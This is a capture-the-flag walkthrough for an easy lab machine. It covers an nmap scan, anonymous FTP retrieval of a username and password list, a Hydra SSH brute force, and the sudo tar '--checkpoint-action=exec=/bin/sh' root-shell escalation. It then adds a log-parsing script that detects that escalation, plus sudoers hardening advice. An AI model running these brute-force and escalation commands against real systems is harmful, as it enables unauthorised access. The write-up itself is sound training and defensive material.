Difficulty level: Easy
Aim: Hack this machine and obtain the user and root flags.
The target IP address is provided when the machine is deployed.
nmap can be used to discover open ports and services on the target:
nmap -A -vv 10.10.237.37
From this we can see the following ports and services:
- port 21/tcp - FTP - (vsftpd 3.0.3)
- port 22/tcp - SSH - (OpenSSH 7.2p2)
- port 80/tcp - HTTP - (Apache httpd 2.4.18)
Anonymous login is allowed for the FTP service, so that seems a good place to start:
After logging in we can see two text files available for download:
ls
get locks.txt
get task.txt
bye
Once downloaded, the contents of these can be viewed from our local terminal:
cat task.txt
cat locks.txt
task.txt gives us a potential username:
locks.txt appears to be a wordlist of potential passwords:
The information above can be used with Hydra to brute-force the SSH service:
hydra -l username -P locks.txt ssh://10.10.237.37
Success! We can now log in via SSH:
The user flag can be found within the current directory once logged in.
Taking a look at the sudo permissions shows that we have access to run /bin/tar as the root user:
We can take advantage of this to elevate our privileges and spawn a shell as the root user by running the following command:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
The '--checkpoint=1' option makes tar reach a checkpoint after every record, and '--checkpoint-action=exec=/bin/sh' tells tar to execute /bin/sh at each checkpoint. Because tar is running as root through sudo, the shell it spawns is a root shell:
The root.txt flag can then be obtained from the /root directory.
cd /root
ls
cat root.txt
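The sudo tar escalation above is recorded in the sudo log, so it can be detected after the fact. The script below is an added example, not part of the original write-up: it assumes sudo's default syslog line format as written to /var/log/auth.log on Debian/Ubuntu, and the users, host and IP address in the sample lines are constructed.

```shell
#!/bin/sh
# Added example: flag sudo-run tar commands that use a checkpoint exec action.

# Constructed sample lines in sudo's syslog format (users, host and IP are made up).
sample_log() {
cat <<'EOF'
Mar  3 10:14:02 box sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/tar -czf /tmp/etc.tgz /etc
Mar  3 10:15:40 box sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Mar  3 10:16:05 box sshd[1201]: Accepted password for alice from 192.0.2.10 port 50222 ssh2
Mar  3 10:17:11 box sudo:      bob : TTY=pts/1 ; PWD=/srv ; USER=root ; COMMAND=/usr/bin/apt update
EOF
}

# Reads log lines on stdin; prints "invoking-user<TAB>run-as-user<TAB>command"
# for every sudo tar invocation whose checkpoint action is exec=...
flag_tar_exec() {
    awk '
    / sudo:/ && /COMMAND=/ {
        p    = index($0, "COMMAND=")
        cmd  = substr($0, p + 8)      # full command as sudo logged it
        head = substr($0, 1, p - 1)   # everything before the command

        user = head;  sub(/^.*sudo:[ \t]*/, "", user); sub(/ : .*$/, "", user)
        runas = head; sub(/^.* USER=/, "", runas);     sub(/ ;.*$/, "", runas)

        split(cmd, argv, " ")
        bin = argv[1]; sub(/^.*\//, "", bin)   # basename of the binary
        if (bin != "tar") next

        # GNU long options may be abbreviated and may take their value after
        # "=" or as the next word, so match the option prefix, not one spelling.
        if (cmd ~ / --checkpoint-[a-z]*[= ]exec=/)
            print user "\t" runas "\t" cmd
    }'
}

# Stand-alone run over the constructed sample; point it at a real log with:
#   flag_tar_exec < /var/log/auth.log
sample_log | flag_tar_exec
```

Detection like this is a backstop. The fix is to remove the unrestricted /bin/tar rule from sudoers, or pin it to a fixed argument list.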
Please feel free to contact me via Twitter and thanks for reading.